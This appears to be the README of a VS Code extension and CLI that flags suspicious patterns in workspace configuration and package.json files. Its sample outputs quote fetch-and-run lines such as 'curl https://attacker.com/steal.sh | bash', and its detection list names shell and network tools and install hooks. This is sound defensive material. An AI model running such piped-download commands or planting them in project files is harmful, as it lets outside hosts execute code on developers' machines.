Night Raven - 정보유출 경보기
VS Code용 정보 유출 경보기 확장 프로그램으로, 개발자에게 작업 공간의 잠재적으로 악의적인 패턴, 난독화된 코드 및 의심스러운 구성에 대해 경고합니다.
Night Raven 이란? 치료하는 백신이 아니라 경고하는 가디언입니다. 의심스러운 코드 패턴을 실행하기 전에 감지하고 경고합니다.
🦅 Features
- Real-time Threat Detection: Monitors
.vscode/tasks.json, launch.json, settings.json, and package.json for suspicious patterns
- Pattern Recognition: Scans for RCE (remote code execution), network calls, code obfuscation, and dangerous file system operations
- Risk Scoring: Calculates overall risk level based on threat severity
- Integrity Verification: Hash-based detection of file tampering
- File Locking: Prevent execution of suspicious files by setting read-only mode
- Encrypted Storage: Secure sensitive information with AES-256-GCM encryption
- Visual Reports: Beautiful, detailed threat reports with actionable recommendations
- CLI Support: Run scans from the command line
- All Features Free: Open source tool with no paid tiers
🎯 Use Cases
- Supply Chain Security: Detects malicious npm install scripts and postinstall hooks
- VS Code Config Monitoring: Alerts when tasks.json contains suspicious shell commands
- Developer Awareness: Warns before executing potentially dangerous configurations
- APT Defense: Detects common attack patterns used in advanced threats
💻 About the Creator
Built by the creator of GitGoing - a VS Code extension that resolves merge conflicts intelligently.
📦 Installation
Download the VSIX file and install in VS Code:
- Open VS Code
- Go to Extensions
- Click "Install from VSIX"
- Select the
night-raven-1.0.0.vsix file
Or install via command line:
code --install-extension night-raven-1.0.0.vsix
🚀 Usage
Quick Scan with Status Bar Icon
- Look for the 🦅 Raven icon in the VS Code status bar (bottom right)
- Click the icon to instantly scan your workspace
- Results appear in the notification panel
Automatic Monitoring
Night Raven automatically monitors critical files and alerts you when threats are detected.
Manual Scanning
- Open Command Palette (
Ctrl+Shift+P / Cmd+Shift+P)
- Run: Night Raven: Scan Workspace
- View detailed threat reports in the webview panel
CLI Mode
# Scan current directory
npx night-raven
# Scan specific project
npx night-raven /path/to/project
# Example
npx night-raven /Users/admin/Desktop/night-raven-test
Output:
🦅 Night Raven CLI
⚠️ 22 threat(s):
🔴 [CRITICAL] RCE
package.json:0
curl https://attacker.com/steal.sh | bash
🟠 [HIGH] NETWORK
package.json:0
http://malicious-site.com/payload.exe
⚡ Risk: 500
Exit code: 1 (if CRITICAL threats found), 0 (if safe)
🔬 Proof of Concept (PoC)
To verify Night Raven's detection capabilities, you can use the included poc-malicious-package.json file.
Create a test directory:
mkdir poc-test
Copy and rename the malicious PoC file:
Copy the poc-malicious-package.json file into the poc-test directory and rename it to package.json.
Scan the directory with Night Raven CLI:
Run the CLI command to scan the specific test directory.
npx night-raven ./poc-test
Check the results:
Night Raven will detect the threats within the malicious package.json and generate a report.
🔍 What It Detects
Critical Threats (RCE)
- Shell execution commands:
curl, wget, powershell, bash, eval, etc.
- Node.js code execution:
child_process.exec, node -e, etc.
High-Risk Patterns
- External network calls:
fetch, axios, http.get, socket
- Environment variable access:
process.env, ${env:...}
- Code obfuscation:
String.fromCharCode, atob/btoa, hex escapes
Medium-Risk Patterns
- File system operations:
fs.writeFile, fs.unlink, fs.rm
- Dangerous npm hooks:
preinstall, postinstall, preuninstall
🎨 Alert Colors & Status
Night Raven provides visual feedback based on threat severity:
| Icon Location |
Alert Color |
Meaning |
Example |
| Status Bar (🦅) |
🔴 Red |
CRITICAL threats detected |
RCE attacks found |
| Status Bar (🦅) |
🟠 Orange |
HIGH threats only |
Network/obfuscation patterns |
| Status Bar (🦅) |
🔵 Blue |
MEDIUM/LOW threats only |
Minor file system access |
| Status Bar (🦅) |
✅ Safe |
No threats found |
Workspace is clean |
Alert Details
- 🔴 Red (Error): CRITICAL threats - Do not run until reviewed
- 🟠 Orange (Warning): HIGH threats - Manual inspection recommended
- 🔵 Blue (Info): MEDIUM/LOW threats - Monitor and review
⚠️ Important Note
Night Raven is a detection and alerting tool, not a protection mechanism. It warns you about suspicious patterns so you can make informed decisions before executing code. It does not prevent or block execution.
📊 Threat Report Example
🦅 Night Raven Security Report
Total: 3 threat(s) | Risk Score: 150
[CRITICAL] RCE in tasks.json:5
Pattern: curl https://suspicious-site.com | bash
Recommendation: Remove or verify this command
[HIGH] NETWORK in package.json:0
Pattern: fetch external resource in postinstall hook
Recommendation: Verify external dependencies
🛠️ Version
1.0.0
📄 License
MIT
🤝 Contributing
Contributions welcome! Please submit issues and PRs on GitHub.
https://github.com/soulnest-git/night-raven
- GitGoing - Intelligent merge conflict resolution for VS Code
